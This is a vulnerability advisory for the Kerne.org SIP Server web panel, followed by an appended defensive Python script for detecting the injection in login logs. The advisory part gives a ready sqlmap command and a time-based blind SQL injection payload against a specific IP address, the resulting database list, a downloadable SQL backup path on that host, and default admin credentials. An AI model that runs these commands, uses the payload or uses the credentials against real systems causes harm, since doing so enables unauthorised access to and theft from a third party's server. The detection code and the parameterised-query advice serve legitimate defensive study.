SIP Server By Kerne.org SQL Injection / Backup Disclosure

2014.05.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

SIP Server by Kerne.org - Multiple Vulnerabilities
===================================================================

####################################################################
.:. Author  : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home    : http://www.iphobos.com/blog/
.:. Script  : Kerne.org
####################################################################

[1] Time-Based Blind Injection [POST]
========================================

sqlmap.py -u "http://177.129.8.146/admin/index.php" --data="action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" -p "username" --level=5 --risk=5 --dbs

sqlmap identified the following injection points with a total of 1751 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
available databases [5]:
[*] billing
[*] cdr
[*] information_schema
[*] proftpd
[*] test

[2] Backup download
====================

Go to [http://177.129.8.146/admin/sql/]; the SQL files found there can be downloaded.

[3] Default Data Admin Login:
==============================

Username: Operations
Password: k3cn18
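For defenders, the payload in section [1] has two recognisable features in the username field: a quote that closes the string literal, and a BENCHMARK() call that stalls the response. The following is an added example, not part of the original advisory or of the product's code: it triages captured login POSTs for those features. The record layout ('path', 'body', 'seconds'), the SLEEP pattern and the 3-second threshold are assumptions; the path, field names and payload come from the advisory.

```python
import re
from urllib.parse import parse_qs

# MySQL functions used to create a measurable delay. BENCHMARK is the one in
# the advisory's payload; SLEEP is added here as the other common variant.
DELAY_CALL = re.compile(r"\b(benchmark|sleep)\s*\(", re.IGNORECASE)
# A quote that closes the string literal, followed by a boolean operator.
QUOTE_BREAKOUT = re.compile(r"[\"']\s*(and|or)\b", re.IGNORECASE)

LOGIN_PATH = "/admin/index.php"          # from the advisory
LOGIN_FIELDS = ("username", "password")  # from the advisory's POST data
SLOW_SECONDS = 3.0                       # assumed threshold, tune per site


def inspect_login_body(body):
    """Return findings for one form-encoded login POST body."""
    findings = []
    params = parse_qs(body, keep_blank_values=True)
    for field in LOGIN_FIELDS:
        for value in params.get(field, []):
            if DELAY_CALL.search(value):
                findings.append(field + ": delay function call")
            if QUOTE_BREAKOUT.search(value):
                findings.append(field + ": quote breakout before AND/OR")
    return findings


def triage(records):
    """Return (index, findings) for each suspicious login record.

    Each record is a dict with 'path', 'body' and 'seconds' (response time).
    """
    alerts = []
    for i, rec in enumerate(records):
        if rec["path"] != LOGIN_PATH:
            continue
        findings = inspect_login_body(rec["body"])
        if findings and rec["seconds"] >= SLOW_SECONDS:
            findings.append("slow response: delay probably executed")
        if findings:
            alerts.append((i, findings))
    return alerts


# Constructed sample records; the second body is the payload quoted above.
SAMPLE = [
    {"path": LOGIN_PATH, "seconds": 0.2,
     "body": "action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12"},
    {"path": LOGIN_PATH, "seconds": 7.9,
     "body": 'action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" '
             'AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM'},
]
```

Pattern matching of this kind is a stopgap for log review; the fix for the injection itself is to bind username and password as query parameters instead of concatenating them into the SQL string.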

